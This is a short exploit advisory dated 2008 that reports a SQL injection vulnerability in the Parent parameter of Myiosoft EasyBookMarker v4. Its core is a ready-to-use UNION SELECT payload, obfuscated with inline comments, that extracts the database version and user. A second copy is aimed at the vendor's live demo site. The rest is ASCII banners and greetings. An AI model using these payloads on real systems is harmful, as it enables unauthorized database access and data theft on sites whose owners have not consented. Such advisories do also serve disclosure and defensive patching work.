Myiosoft EasyBookMarker version 4 suffers from a remote SQL injection vulnerability.
83df2edfd70212f9a43b6667f15e25105d3452e00d682c09041279a896ac4d01
==============================================================================
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ / ___ \ | _ |
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|
==============================================================================
____ _ _ _ _ ___ _ __
/ ___| | || | | \ | | / _ \ | |/ /
| | _ | || |_ | \| | | | | | | ' /
| |_| | |__ _| | |\ | | |_| | | . \
\____| |_| |_| \_| \___/ |_|\_\
==============================================================================
Myiosoft EasyBookMarker v4 (Parent) SQL Injection Vulnerability
==============================================================================
[»] Script: [ Myiosoft EasyBookMarker ]
[»] Language: [ PHP ]
[»] Website: [ http://myiosoft.com/?1.4.0.0 ]
[»] Type: [ Commercial ]
[»] Report-Date: [ 07.11.2008 ]
[»] Founder: [ G4N0K <mail.ganok[at]gmail.com> ]
===[ XPL ]===
[»] http://localhost/[path]/plugins/bookmarker/bookmarker_backend.php?pagebm=mfolders&Parent=-99999/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(version(),0x3a,user()),5--
===[ LIVE ]===
[»] http://myiosoft.com/products/EasyBookMarker/demo/plugins/bookmarker/bookmarker_backend.php?pagebm=mfolders&Parent=-99999/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(version(),0x3a,user()),5--
===[ Greetz ]===
[»] ALLAH
[»] Tornado2800 <Tornado2800[at]gmail.com>
[»] Hussain-X <darkangel_g85[at]yahoo.com>
//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
//ALLAH,forgimme...
===============================================================================
exit(); //EoX
===============================================================================